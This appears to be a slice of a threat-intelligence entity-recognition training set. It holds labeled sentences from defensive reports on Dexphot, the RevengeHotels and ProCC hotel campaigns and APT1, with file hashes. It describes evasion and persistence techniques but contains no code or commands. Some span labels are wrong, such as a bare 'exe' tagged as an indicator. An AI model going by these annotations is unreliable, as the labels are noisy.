{"text": "Dexphot usually extracts the decompressed files to the target system ’s Favorites folder .", "spans": {"Malware: Dexphot": [[0, 7]], "System: Favorites folder": [[72, 88]]}, "info": {"id": "aptner_train_001833", "source": "aptner_train"}}
{"text": "The files are given new , random names , which are generated by concatenating words and numbers based on the time of execution ( for example , C:\\Users\\<user>\\Favorites\\\\Res.Center.ponse\\<numbers> ) .", "spans": {}, "info": {"id": "aptner_train_001834", "source": "aptner_train"}}
{"text": "Msiexec.exe next calls rundll32.exe , specifying loader DLL ( urlmon.7z in the example above ) in order to decrypt the data file .", "spans": {"Indicator: Msiexec.exe": [[0, 11]], "Indicator: rundll32.exe": [[23, 35]], "System: loader DLL": [[49, 59]], "Indicator: urlmon.7z": [[62, 71]], "Malware: decrypt the data file": [[107, 128]]}, "info": {"id": "aptner_train_001835", "source": "aptner_train"}}
{"text": "The decryption process involves ADD and XOR operations , using a key hardcoded in the binary .", "spans": {}, "info": {"id": "aptner_train_001836", "source": "aptner_train"}}
{"text": "The decrypted data contains three executables .", "spans": {}, "info": {"id": "aptner_train_001837", "source": "aptner_train"}}
{"text": "Unlike the files described earlier , these executables are never written to the filesystem .", "spans": {}, "info": {"id": "aptner_train_001838", "source": "aptner_train"}}
{"text": "Instead , they exist only in memory , and Dexphot runs them by loading them into other system processes via process hollowing .", "spans": {"Malware: Dexphot": [[42, 49]], "System: process hollowing": [[108, 125]]}, "info": {"id": "aptner_train_001839", "source": "aptner_train"}}
{"text": "Process hollowing is a technique that can hide malware within a legitimate system process .", "spans": {"System: Process hollowing": [[0, 17]]}, "info": {"id": "aptner_train_001840", "source": "aptner_train"}}
{"text": "It replaces the contents of the legitimate process with malicious code .", "spans": {}, "info": {"id": "aptner_train_001841", "source": "aptner_train"}}
{"text": "Detecting malicious code hidden using this method is not trivial , so process hollowing has become a prevalent technique used by malware today .", "spans": {"System: process hollowing": [[70, 87]]}, "info": {"id": "aptner_train_001842", "source": "aptner_train"}}
{"text": "This method has the additional benefit of being fileless : the code can be run without actually being saved on the file system .", "spans": {}, "info": {"id": "aptner_train_001843", "source": "aptner_train"}}
{"text": "Not only is it harder to detect the malicious code while it ’s running , it ’s harder to find useful forensics after the process has stopped .", "spans": {}, "info": {"id": "aptner_train_001844", "source": "aptner_train"}}
{"text": "To initiate process hollowing , the loader DLL targets two legitimate system processes , for example svchost.exe or nslookup.exe , and spawns them in a suspended state .", "spans": {"System: process hollowing": [[12, 29]], "System: the loader DLL": [[32, 46]], "Indicator: svchost.exe": [[101, 112]], "Indicator: nslookup.exe": [[116, 128]]}, "info": {"id": "aptner_train_001845", "source": "aptner_train"}}
{"text": "The loader DLL replaces the contents of these processes with the first and second decrypted executables .", "spans": {"System: The loader DLL": [[0, 14]]}, "info": {"id": "aptner_train_001846", "source": "aptner_train"}}
{"text": "These executables are monitoring services for maintaining Dexphot ’s components .", "spans": {"Malware: Dexphot": [[58, 65]]}, "info": {"id": "aptner_train_001847", "source": "aptner_train"}}
{"text": "The now-malicious processes are released from suspension and run .", "spans": {}, "info": {"id": "aptner_train_001848", "source": "aptner_train"}}
{"text": "Next , the loader DLL targets the setup.exe file in SysWoW64 .", "spans": {"System: the loader DLL": [[7, 21]], "Indicator: setup.exe": [[34, 43]], "System: SysWoW64": [[52, 60]]}, "info": {"id": "aptner_train_001849", "source": "aptner_train"}}
{"text": "It removes setup.exe ’s contents and replaces them with the third decrypted executable , a cryptocurrency miner .", "spans": {"Indicator: setup.exe": [[11, 20]]}, "info": {"id": "aptner_train_001850", "source": "aptner_train"}}
{"text": "Although Dexphot always uses a cryptocurrency miner of some kind , it ’s not always the same miner .", "spans": {"Malware: Dexphot": [[9, 16]]}, "info": {"id": "aptner_train_001851", "source": "aptner_train"}}
{"text": "It used different programs like XMRig and JCE Miner over the course of our research .", "spans": {"Malware: XMRig": [[32, 37]], "Malware: JCE Miner": [[42, 51]]}, "info": {"id": "aptner_train_001852", "source": "aptner_train"}}
{"text": "The two monitoring services simultaneously check the status of all three malicious processes .", "spans": {}, "info": {"id": "aptner_train_001853", "source": "aptner_train"}}
{"text": "Having dual monitoring services provides redundancy in case one of the monitoring processes is halted .", "spans": {}, "info": {"id": "aptner_train_001854", "source": "aptner_train"}}
{"text": "If any of the processes are terminated , the monitors immediately identify the situation , terminate all remaining malicious processes , and re-infect the device .", "spans": {}, "info": {"id": "aptner_train_001855", "source": "aptner_train"}}
{"text": "The monitoring components also detect freshly launched cmd.exe processes and terminate them promptly .", "spans": {"Indicator: cmd.exe": [[55, 62]]}, "info": {"id": "aptner_train_001856", "source": "aptner_train"}}
{"text": "As a final fail-safe , Dexphot uses schtasks.exe to create scheduled tasks .", "spans": {"Indicator: schtasks.exe": [[36, 48]]}, "info": {"id": "aptner_train_001857", "source": "aptner_train"}}
{"text": "This persistence technique is interesting , because it employs two distinct MITRE ATT&CK techniques : Scheduled Task and Signed Binary Proxy Execution .", "spans": {"System: MITRE ATT&CK": [[76, 88]], "System: Scheduled Task": [[102, 116]], "System: Signed Binary Proxy Execution": [[121, 150]]}, "info": {"id": "aptner_train_001858", "source": "aptner_train"}}
{"text": "The scheduled tasks call msiexec.exe as a proxy to run the malicious code , much like how msiexec.exe was used during installation .", "spans": {"Indicator: msiexec.exe": [[25, 36], [90, 101]]}, "info": {"id": "aptner_train_001859", "source": "aptner_train"}}
{"text": "Using msiexec.exe , a legitimate system process , can make it harder to trace the source of malicious activity .", "spans": {"Indicator: msiexec.exe": [[6, 17]]}, "info": {"id": "aptner_train_001860", "source": "aptner_train"}}
{"text": "Furthermore , the tasks allow Dexphot to conveniently update the payload from the web every time the tasks run .", "spans": {"Malware: Dexphot": [[30, 37]]}, "info": {"id": "aptner_train_001861", "source": "aptner_train"}}
{"text": "They automatically update all of Dexphot ’s components , both upon system reboot as well as every 90 or 110 minutes while the system is running .", "spans": {"Malware: Dexphot": [[33, 40]]}, "info": {"id": "aptner_train_001862", "source": "aptner_train"}}
{"text": "Dexphot also generates the names for the tasks at runtime , which means a simple block list of hardcoded task names will not be effective in preventing them from running .", "spans": {"Malware: Dexphot": [[0, 7]]}, "info": {"id": "aptner_train_001863", "source": "aptner_train"}}
{"text": "The names are usually in a GUID format , although after we released our first round of Dexphot-blocking protections , the threat authors began to use random strings .", "spans": {}, "info": {"id": "aptner_train_001864", "source": "aptner_train"}}
{"text": "The threat authors have one more evasion technique for these scheduled tasks : some Dexphot variants copy msiexec.exe to an arbitrary location and give it a random name , such as %AppData%\\<random>.exe .", "spans": {"Malware: Dexphot": [[84, 91]], "Indicator: msiexec.exe": [[106, 117]], "Indicator: %AppData%\\<random>.exe": [[179, 201]]}, "info": {"id": "aptner_train_001865", "source": "aptner_train"}}
{"text": "This makes the system process running malicious code a literal moving target .", "spans": {}, "info": {"id": "aptner_train_001866", "source": "aptner_train"}}
{"text": "Dexphot exhibits multiple layers of polymorphism across the binaries it distributes .", "spans": {"Malware: Dexphot": [[0, 7]]}, "info": {"id": "aptner_train_001867", "source": "aptner_train"}}
{"text": "For example , the MSI package used in the campaign contains different files , as shown in the table below .", "spans": {"System: MSI": [[18, 21]]}, "info": {"id": "aptner_train_001868", "source": "aptner_train"}}
{"text": "The MSI packages generally include a clean version of unzIP .", "spans": {"System: MSI": [[4, 7]], "System: unzIP": [[54, 59]]}, "info": {"id": "aptner_train_001869", "source": "aptner_train"}}
{"text": "exe , a password-protected ZIP file , and a batch file that checks for currently installed antivirus products .", "spans": {"Indicator: exe": [[0, 3]]}, "info": {"id": "aptner_train_001870", "source": "aptner_train"}}
{"text": "However , the batch file is not always present , and the names of the ZIP files and Loader DLLs , as well as the password for extracting the ZIP file , all change from one package to the next .", "spans": {"System: Loader DLLs": [[84, 95]]}, "info": {"id": "aptner_train_001871", "source": "aptner_train"}}
{"text": "In addition , the contents of each Loader DLL differs from package to package , as does the encrypted data included in the ZIP file .", "spans": {"System: Loader DLL": [[35, 45]]}, "info": {"id": "aptner_train_001872", "source": "aptner_train"}}
{"text": "This leads to the generation of a different ZIP archive and , in turn , a unique MSI package , each time the attacker bundles the files together .", "spans": {"System: ZIP archive": [[44, 55]], "System: MSI": [[81, 84]]}, "info": {"id": "aptner_train_001873", "source": "aptner_train"}}
{"text": "Because of these carefully designed layers of polymorphism , a traditional file-based detection approach wouldn’t be effective against Dexphot .", "spans": {"Malware: Dexphot": [[135, 142]]}, "info": {"id": "aptner_train_001874", "source": "aptner_train"}}
{"text": "Besides tracking the files and processes that Dexphot uses to execute an attack , we have also been monitoring the domains used to host malicious payloads .", "spans": {"Malware: Dexphot": [[46, 53]]}, "info": {"id": "aptner_train_001875", "source": "aptner_train"}}
{"text": "The URLs used for hosting all follow a similar pattern .", "spans": {}, "info": {"id": "aptner_train_001876", "source": "aptner_train"}}
{"text": "The domain address usually ends in a .info or .net TLD , while the file name for the actual payload consists of random characters , similar to the randomness previously seen being used to generate file names and scheduled tasks .", "spans": {"Indicator: .info": [[37, 42]], "Indicator: .net": [[46, 50]]}, "info": {"id": "aptner_train_001877", "source": "aptner_train"}}
{"text": "Many of the URLs listed were in use for an extended period .", "spans": {}, "info": {"id": "aptner_train_001878", "source": "aptner_train"}}
{"text": "However , the MSI packages hosted at each URL are frequently changed or updated .", "spans": {"System: MSI": [[14, 17]]}, "info": {"id": "aptner_train_001879", "source": "aptner_train"}}
{"text": "In addition , every few days more domains are generated to host more payloads .", "spans": {}, "info": {"id": "aptner_train_001880", "source": "aptner_train"}}
{"text": "After a few months of monitoring , we were able to identify around 200 unique Dexphot domains .", "spans": {"Malware: Dexphot": [[78, 85]]}, "info": {"id": "aptner_train_001881", "source": "aptner_train"}}
{"text": "Dexphot is not the type of attack that generates mainstream media attention ; it ’s one of the countless malware campaigns that are active at any given time .", "spans": {"Malware: Dexphot": [[0, 7]]}, "info": {"id": "aptner_train_001882", "source": "aptner_train"}}
{"text": "Its goal is a very common one in cybercriminal circles — to install a coin miner that silently steals computer resources and generates revenue for the attackers — yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats , intent on evading protections and motivated to fly under the radar for the prospect of profit .", "spans": {"Malware: Dexphot": [[167, 174]]}, "info": {"id": "aptner_train_001883", "source": "aptner_train"}}
{"text": "To combat threats , several next-generation protection engines in Microsoft Defender Advanced Threat Protection ’s antivirus component detect and stop malicious techniques at multiple points along the attack chain .", "spans": {"System: Microsoft Defender Advanced Threat Protection": [[66, 111]], "System: antivirus component": [[115, 134]]}, "info": {"id": "aptner_train_001884", "source": "aptner_train"}}
{"text": "For Dexphot , machine learning-based detections in the cloud recognize and block the DLLs loaded by rundll32.exe , stopping the attack chain in its early stages .", "spans": {"Malware: Dexphot": [[4, 11]], "System: DLLs": [[85, 89]], "Indicator: rundll32.exe": [[100, 112]]}, "info": {"id": "aptner_train_001885", "source": "aptner_train"}}
{"text": "Memory scans detect and terminate the loading of malicious code hidden by process hollowing — including the monitoring processes that attempt to update the malware code and re-infect the machine via PowerShell commands .", "spans": {"System: process hollowing": [[74, 91]], "System: PowerShell": [[199, 209]]}, "info": {"id": "aptner_train_001886", "source": "aptner_train"}}
{"text": "Behavioral blocking and containment capabilities are especially effective in defeating Dexphot ’s fileless techniques , detection evasion , and persistence mechanisms , including the periodic and boot-time attempts to update the malware via scheduled tasks .", "spans": {"Malware: Dexphot": [[87, 94]]}, "info": {"id": "aptner_train_001887", "source": "aptner_train"}}
{"text": "As mentioned , given the complexity of the attack chain and of Dexphot ’s persistence methods , we released a remediation solution that prevents re-infection by removing artifacts .", "spans": {"Malware: Dexphot": [[63, 70]]}, "info": {"id": "aptner_train_001888", "source": "aptner_train"}}
{"text": "The detection , blocking , and remediation of Dexphot on endpoints are exposed in Microsoft Defender Security Center , where Microsoft Defender ATP ’s rich capabilities like endpoint detection and response , automated investigation and remediation , and others enable security operations teams to investigate and remediate attacks in enterprise environments .", "spans": {"Malware: Dexphot": [[46, 53]], "System: Microsoft Defender Security Center": [[82, 116]], "System: Microsoft Defender ATP": [[125, 147]]}, "info": {"id": "aptner_train_001889", "source": "aptner_train"}}
{"text": "With these capabilities , Microsoft Defender ATP provides comprehensive protection against Dexphot and the countless other complex and evolving threats that we face every day .", "spans": {"System: Microsoft Defender ATP": [[26, 48]], "Malware: Dexphot": [[91, 98]]}, "info": {"id": "aptner_train_001890", "source": "aptner_train"}}
{"text": "Dexphot : 72acaf9ff8a43c68416884a3fff3b23e749b4bb8fb39e16f9976643360ed391f .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: 72acaf9ff8a43c68416884a3fff3b23e749b4bb8fb39e16f9976643360ed391f": [[10, 74]]}, "info": {"id": "aptner_train_001891", "source": "aptner_train"}}
{"text": "Dexphot : 22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3 .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: 22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3": [[10, 74]]}, "info": {"id": "aptner_train_001892", "source": "aptner_train"}}
{"text": "Dexphot : 65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: 65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a": [[10, 74]]}, "info": {"id": "aptner_train_001893", "source": "aptner_train"}}
{"text": "Dexphot : ba9467e0d63ba65bf10650a3c8d36cd292b3f846983032a44a835e5966bc7e88 .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: ba9467e0d63ba65bf10650a3c8d36cd292b3f846983032a44a835e5966bc7e88": [[10, 74]]}, "info": {"id": "aptner_train_001894", "source": "aptner_train"}}
{"text": "Dexphot : 537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: 537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e": [[10, 74]]}, "info": {"id": "aptner_train_001895", "source": "aptner_train"}}
{"text": "Dexphot : 504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5 .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: 504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5": [[10, 74]]}, "info": {"id": "aptner_train_001896", "source": "aptner_train"}}
{"text": "Dexphot : aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152 .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152": [[10, 74]]}, "info": {"id": "aptner_train_001897", "source": "aptner_train"}}
{"text": "RevengeHotels : cybercrime targeting hotel front desks worldwide .", "spans": {"Organization: RevengeHotels": [[0, 13]]}, "info": {"id": "aptner_train_001898", "source": "aptner_train"}}
{"text": "RevengeHotels is a targeted cybercrime malware campaign against hotels , hostels , hospitality and tourism companies , mainly , but not exclusively , located in Brazil .", "spans": {"Organization: RevengeHotels": [[0, 13]]}, "info": {"id": "aptner_train_001899", "source": "aptner_train"}}
{"text": "We have confirmed more than 20 hotels that are victims of the group , located in eight states in Brazil , but also in other countries such as Argentina , Bolivia , Chile , Costa Rica , France , Italy , Mexico , Portugal , Spain , Thailand and Turkey .", "spans": {}, "info": {"id": "aptner_train_001900", "source": "aptner_train"}}
{"text": "The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems , as well as credit card data received from popular online travel agencies ( OTAs ) such as Booking.com .", "spans": {"Organization: online travel agencies": [[158, 180]], "Organization: OTAs": [[183, 187]], "Indicator: Booking.com": [[198, 209]]}, "info": {"id": "aptner_train_001901", "source": "aptner_train"}}
{"text": "The main attack vector is via email with crafted Word , Excel or PDF documents attached .", "spans": {}, "info": {"id": "aptner_train_001902", "source": "aptner_train"}}
{"text": "Some of them exploit CVE-2017-0199 , loading it using VBS and PowerShell scripts and then installing customized versions of RevengeRAT , NjRAT , NanoCoreRAT , 888 RAT and other custom malware such as ProCC in the victim ’s machine .", "spans": {"Vulnerability: CVE-2017-0199": [[21, 34]], "System: PowerShell": [[62, 72]], "Malware: RevengeRAT": [[124, 134]], "Malware: NjRAT": [[137, 142]], "Malware: NanoCoreRAT": [[145, 156]], "Malware: 888 RAT": [[159, 166]], "Malware: ProCC": [[200, 205]]}, "info": {"id": "aptner_train_001903", "source": "aptner_train"}}
{"text": "The group has been active since 2015 , but increased its attacks in 2019 .", "spans": {}, "info": {"id": "aptner_train_001904", "source": "aptner_train"}}
{"text": "In our research , we were also able to track two groups targeting the hospitality sector , using separate but similar infrastructure , tools and techniques .", "spans": {}, "info": {"id": "aptner_train_001905", "source": "aptner_train"}}
{"text": "PaloAlto has already written about one of them .", "spans": {"Organization: PaloAlto": [[0, 8]]}, "info": {"id": "aptner_train_001906", "source": "aptner_train"}}
{"text": "We named the first group RevengeHotels , and the second ProCC .", "spans": {"Organization: RevengeHotels": [[25, 38]], "Organization: ProCC": [[56, 61]]}, "info": {"id": "aptner_train_001907", "source": "aptner_train"}}
{"text": "These groups use a lot of social engineering in their attacks , asking for a quote from what appears to be a government entity or private company wanting to make a reservation for a large number of people .", "spans": {}, "info": {"id": "aptner_train_001908", "source": "aptner_train"}}
{"text": "Their infrastructure also relies on the use of dynamic DNS services pointing to commercial hosting and self-hosted servers .", "spans": {}, "info": {"id": "aptner_train_001909", "source": "aptner_train"}}
{"text": "They also sell credentials from the affected systems , allowing other cybercriminals to have remote access to hotel front desks infected by the campaign .", "spans": {}, "info": {"id": "aptner_train_001910", "source": "aptner_train"}}
{"text": "We monitored the activities of these groups and the new malware they are creating for over a year .", "spans": {}, "info": {"id": "aptner_train_001911", "source": "aptner_train"}}
{"text": "With a high degree of confidence , we can confirm that at least two distinct groups are focused on attacking this sector ; there is also a third group , though it is unclear if its focus is solely on this sector or if carries out other types of attacks .", "spans": {}, "info": {"id": "aptner_train_001912", "source": "aptner_train"}}
{"text": "One of the tactics used in operations by these groups is highly targeted spear-phishing messages .", "spans": {}, "info": {"id": "aptner_train_001913", "source": "aptner_train"}}
{"text": "They register typo-squatting domains , impersonating legitimate companies .", "spans": {}, "info": {"id": "aptner_train_001914", "source": "aptner_train"}}
{"text": "The emails are well written , with an abundance of detail .", "spans": {"System: emails": [[4, 10]]}, "info": {"id": "aptner_train_001915", "source": "aptner_train"}}
{"text": "They explain why the company has chosen to book that particular hotel .", "spans": {}, "info": {"id": "aptner_train_001916", "source": "aptner_train"}}
{"text": "By checking the sender information , it ’s possible to determine whether the company actually exists .", "spans": {}, "info": {"id": "aptner_train_001917", "source": "aptner_train"}}
{"text": "However , there is a small difference between the domain used to send the email and the real one .", "spans": {"System: email": [[74, 79]]}, "info": {"id": "aptner_train_001918", "source": "aptner_train"}}
{"text": "This spear-phishing message , written in Portuguese , has a malicious file attached misusing the name of a real attorney office , while the domain sender of the message was registered one day before , using a typo-squatting domain .", "spans": {}, "info": {"id": "aptner_train_001919", "source": "aptner_train"}}
{"text": "The group goes further in its social engineering effort : to convince the hotel personnel about the legitimacy of their request , a copy of the National Registry of Legal Entities card ( CNPJ ) is attached to the quotation .", "spans": {}, "info": {"id": "aptner_train_001920", "source": "aptner_train"}}
{"text": "The attached file , Reserva Advogados Associados.docx ( Attorneys Associates Reservation.docx ) , is a malicious Word file that drops a remote OLE object via template injection to execute macro code .", "spans": {"Indicator: Reserva Advogados Associados.docx": [[20, 53]], "Indicator: Attorneys Associates Reservation.docx": [[56, 93]], "System: OLE": [[143, 146]]}, "info": {"id": "aptner_train_001921", "source": "aptner_train"}}
{"text": "The macro code inside the remote OLE document contains PowerShell commands that download and execute the final payload .", "spans": {"System: OLE": [[33, 36]], "System: PowerShell": [[55, 65]]}, "info": {"id": "aptner_train_001922", "source": "aptner_train"}}
{"text": "In the RevengeHotels campaign , the downloaded files are .NET binaries protected with the Yoda Obfuscator .", "spans": {"Organization: RevengeHotels": [[7, 20]], "Indicator: .NET": [[57, 61]], "Malware: Yoda Obfuscator": [[90, 105]]}, "info": {"id": "aptner_train_001923", "source": "aptner_train"}}
{"text": "After unpacking them , the code is recognizable as the commercial RAT RevengeRAT .", "spans": {"Malware: RAT": [[66, 69]], "Malware: RevengeRAT": [[70, 80]]}, "info": {"id": "aptner_train_001924", "source": "aptner_train"}}
{"text": "An additional module written by the group called ScreenBooking is used to capture credit card data .", "spans": {"Malware: ScreenBooking": [[49, 62]]}, "info": {"id": "aptner_train_001925", "source": "aptner_train"}}
{"text": "It monitors whether the user is browsing the web page .", "spans": {}, "info": {"id": "aptner_train_001926", "source": "aptner_train"}}
{"text": "In the initial versions , back in 2016 , the downloaded files from RevengeHotels campaigns were divided into two modules : a backdoor and a module to capture screenshots .", "spans": {"Organization: RevengeHotels": [[67, 80]], "Malware: backdoor": [[125, 133]]}, "info": {"id": "aptner_train_001927", "source": "aptner_train"}}
{"text": "Recently we noticed that these modules had been merged into a single backdoor module able to collect data from clipboard and capture screenshots .", "spans": {}, "info": {"id": "aptner_train_001928", "source": "aptner_train"}}
{"text": "In this example , the webpage that the attacker is monitoring is booking.com ( more specifically , the page containing the card details ) .", "spans": {"Indicator: booking.com": [[65, 76]]}, "info": {"id": "aptner_train_001929", "source": "aptner_train"}}
{"text": "The code is specifically looking for data in Portuguese and English , allowing the attackers to steal credit card data from web pages written in these languages .", "spans": {}, "info": {"id": "aptner_train_001930", "source": "aptner_train"}}
{"text": "In the ProCC campaigns , the downloaded files are Delphi binaries .", "spans": {"Organization: ProCC": [[7, 12]], "System: Delphi": [[50, 56]]}, "info": {"id": "aptner_train_001931", "source": "aptner_train"}}
{"text": "The backdoor installed in the machine is more customized than that used by RevengeHotels : it ’s developed from scratch and is able to collect data from the clipboard and printer spooler , and capture screenshots .", "spans": {"Malware: backdoor": [[4, 12]], "Organization: RevengeHotels": [[75, 88]]}, "info": {"id": "aptner_train_001932", "source": "aptner_train"}}
{"text": "Because the personnel in charge of confirming reservations usually need to pull credit card data from OTA websites , it ’s possible to collect card numbers by monitoring the clipboard and the documents sent to the printer .", "spans": {"System: OTA websites": [[102, 114]]}, "info": {"id": "aptner_train_001933", "source": "aptner_train"}}
{"text": "According to the relevant underground forums and messaging groups , these criminals also infect front desk machines in order to capture credentials from the hotel administration software ; they can then steal credit card details from it too .", "spans": {}, "info": {"id": "aptner_train_001934", "source": "aptner_train"}}
{"text": "Some criminals also sell remote access to these systems , acting as a concierge for other cybercriminals by giving them permanent access to steal new data by themselves .", "spans": {}, "info": {"id": "aptner_train_001935", "source": "aptner_train"}}
{"text": "Some Brazilian criminals tout credit card data extracted from a hotel ’s system as high quality and reliable because it was extracted from a trusted source , i.e. , a hotel administration system .", "spans": {"Organization: Brazilian criminals": [[5, 24]]}, "info": {"id": "aptner_train_001936", "source": "aptner_train"}}
{"text": "The majority of the victims are associated with the hospitality sector .", "spans": {}, "info": {"id": "aptner_train_001937", "source": "aptner_train"}}
{"text": "Based on the routines used , we estimate that this attack has a global reach .", "spans": {}, "info": {"id": "aptner_train_001938", "source": "aptner_train"}}
{"text": "Based on data extracted from Bit.ly statistics , we can see that potential victims from many other countries have at least accessed the malicious link .", "spans": {"Indicator: Bit.ly": [[29, 35]]}, "info": {"id": "aptner_train_001939", "source": "aptner_train"}}
{"text": "This data suggests that the number of countries with potential victims is higher than our telemetry has registered .", "spans": {}, "info": {"id": "aptner_train_001940", "source": "aptner_train"}}
{"text": "RevengeHotels is a campaign that has been active since at least 2015 , revealing different groups using traditional RAT malware to infect businesses in the hospitality sector .", "spans": {"Organization: RevengeHotels": [[0, 13]], "Malware: RAT": [[116, 119]]}, "info": {"id": "aptner_train_001941", "source": "aptner_train"}}
{"text": "While there is a marked interest in Brazilian victims , our telemetry shows that their reach has extended to other countries in Latin America and beyond .", "spans": {}, "info": {"id": "aptner_train_001942", "source": "aptner_train"}}
{"text": "The use of spear-phishing emails , malicious documents and RAT malware is yielding significant results for at least two groups we have identified in this campaign .", "spans": {"Malware: RAT": [[59, 62]]}, "info": {"id": "aptner_train_001943", "source": "aptner_train"}}
{"text": "Other threat actors may also be part of this wave of attacks , though there is no confirmation at the current time .", "spans": {}, "info": {"id": "aptner_train_001944", "source": "aptner_train"}}
{"text": "If you want to be a savvy and safe traveler , it ’s highly recommended to use a virtual payment card for reservations made via OTAs , as these cards normally expire after one charge .", "spans": {"System: OTAs": [[127, 131]]}, "info": {"id": "aptner_train_001945", "source": "aptner_train"}}
{"text": "While paying for your reservation or checking out at a hotel , it ’s a good idea to use a virtual wallet such as Apple Pay , Google Pay , etc .", "spans": {"System: Apple Pay": [[113, 122]], "System: Google Pay": [[125, 135]]}, "info": {"id": "aptner_train_001946", "source": "aptner_train"}}
{"text": "RevengeHotels : 74440d5d0e6ae9b9a03d06dd61718f66 .", "spans": {"Organization: RevengeHotels": [[0, 13]], "Indicator: 74440d5d0e6ae9b9a03d06dd61718f66": [[16, 48]]}, "info": {"id": "aptner_train_001947", "source": "aptner_train"}}
{"text": "RevengeHotels : e675bdf6557350a02f15c14f386fcc47 .", "spans": {"Organization: RevengeHotels": [[0, 13]], "Indicator: e675bdf6557350a02f15c14f386fcc47": [[16, 48]]}, "info": {"id": "aptner_train_001948", "source": "aptner_train"}}
{"text": "RevengeHotels : df632e25c32e8f8ad75ed3c50dd1cd47 .", "spans": {"Organization: RevengeHotels": [[0, 13]], "Indicator: df632e25c32e8f8ad75ed3c50dd1cd47": [[16, 48]]}, "info": {"id": "aptner_train_001949", "source": "aptner_train"}}
{"text": "RevengeHotels : a089efd7dd9180f9b726594bb6cf81ae .", "spans": {"Organization: RevengeHotels": [[0, 13]], "Indicator: a089efd7dd9180f9b726594bb6cf81ae": [[16, 48]]}, "info": {"id": "aptner_train_001950", "source": "aptner_train"}}
{"text": "RevengeHotels : 81701c891a1766c51c74bcfaf285854b .", "spans": {"Organization: RevengeHotels": [[0, 13]], "Indicator: 81701c891a1766c51c74bcfaf285854b": [[16, 48]]}, "info": {"id": "aptner_train_001951", "source": "aptner_train"}}
{"text": "APT1 .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_001952", "source": "aptner_train"}}
{"text": "Since 2004 , Mandiant has investigated computer security breaches at hundreds of organizations around the world.The majority of these security breaches are attributed to advanced threat actors referred to as the “ Advanced Persistent Threat ” ( APT ) .", "spans": {"Organization: Mandiant": [[13, 21]]}, "info": {"id": "aptner_train_001953", "source": "aptner_train"}}
{"text": "We first published details about the APT in our January 2010 M-Trends report .", "spans": {"Organization: M-Trends": [[61, 69]]}, "info": {"id": "aptner_train_001954", "source": "aptner_train"}}
{"text": "As we stated in there port , our position was that “ The Chinese government may authorize this activity , but there ’s no way to determine the extent of its involvement. ” Now , three years later , we have the evidence required to change our assessment .", "spans": {}, "info": {"id": "aptner_train_001955", "source": "aptner_train"}}
{"text": "The details we have analyzed during hundreds of investigations convince us that the groups conducting these activities are based primarily in China and that the Chinese Government is aware of them .", "spans": {}, "info": {"id": "aptner_train_001956", "source": "aptner_train"}}
{"text": "Mandiant continues to track dozens of APT groups around the world ; however , this report is focused on the most prolific of these groups .", "spans": {"Organization: Mandiant": [[0, 8]]}, "info": {"id": "aptner_train_001957", "source": "aptner_train"}}
{"text": "We refer to this group as “ APT1 ” and it is one of more than 20 APT groups with origins inChina .", "spans": {"Organization: APT1": [[28, 32]]}, "info": {"id": "aptner_train_001958", "source": "aptner_train"}}
{"text": "APT1 is a single organization of operators that has conducted a cyber espionage campaign against a broad range of victims since at least 2006 .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_001959", "source": "aptner_train"}}
{"text": "From our observations , it is one of the most prolific cyber espionage groups in terms of the sheer quantity of information stolen .", "spans": {}, "info": {"id": "aptner_train_001960", "source": "aptner_train"}}
{"text": "The scale and impact of APT1 ’s operations compelled us to write this report .", "spans": {"Organization: APT1": [[24, 28]]}, "info": {"id": "aptner_train_001961", "source": "aptner_train"}}
{"text": "The activity we have directly observed likely represents only a small fraction of the cyber espionage that APT1 has conducted .", "spans": {"Organization: APT1": [[107, 111]]}, "info": {"id": "aptner_train_001962", "source": "aptner_train"}}
{"text": "Though our visibility of APT1 ’s activities is incomplete , we have analyzed the group ’s intrusions against nearly 150 victims over seven years .", "spans": {"Organization: APT1": [[25, 29]]}, "info": {"id": "aptner_train_001963", "source": "aptner_train"}}
{"text": "From our unique vantage point responding to victims , we tracked APT1 back to four large networks in Shanghai , two of which are allocated directly to the Pudong New Area .", "spans": {"Organization: APT1": [[65, 69]]}, "info": {"id": "aptner_train_001964", "source": "aptner_train"}}
{"text": "We uncovered a substantial amount of APT1 ’s attack infrastructure , command and control , and modus operandi ( tools , tactics , and procedures ) .", "spans": {"Organization: APT1": [[37, 41]]}, "info": {"id": "aptner_train_001965", "source": "aptner_train"}}
{"text": "In an effort to underscore there are actual individuals behind the keyboard , Mandiant is revealing three personas we have attributed to APT1 .", "spans": {"Organization: Mandiant": [[78, 86]], "Organization: APT1": [[137, 141]]}, "info": {"id": "aptner_train_001966", "source": "aptner_train"}}
{"text": "These operators , like soldiers , may merely be following orders given to them by others .", "spans": {}, "info": {"id": "aptner_train_001967", "source": "aptner_train"}}
{"text": "We believe that APT1 is able to wage such a long-running and extensive cyber espionage campaign in large part because it receives direct government support .", "spans": {"Organization: APT1": [[16, 20]]}, "info": {"id": "aptner_train_001969", "source": "aptner_train"}}
{"text": "In seeking to identify the organization behind this activity ,our research found that People ’s Liberation Army ( PLA ’s ) Unit 61398 is similar to APT1 in its mission , capabilities , and resources .", "spans": {"Organization: People ’s Liberation Army": [[86, 111]], "Organization: PLA": [[114, 117]], "Organization: Unit 61398": [[123, 133]], "Organization: APT1": [[148, 152]]}, "info": {"id": "aptner_train_001970", "source": "aptner_train"}}
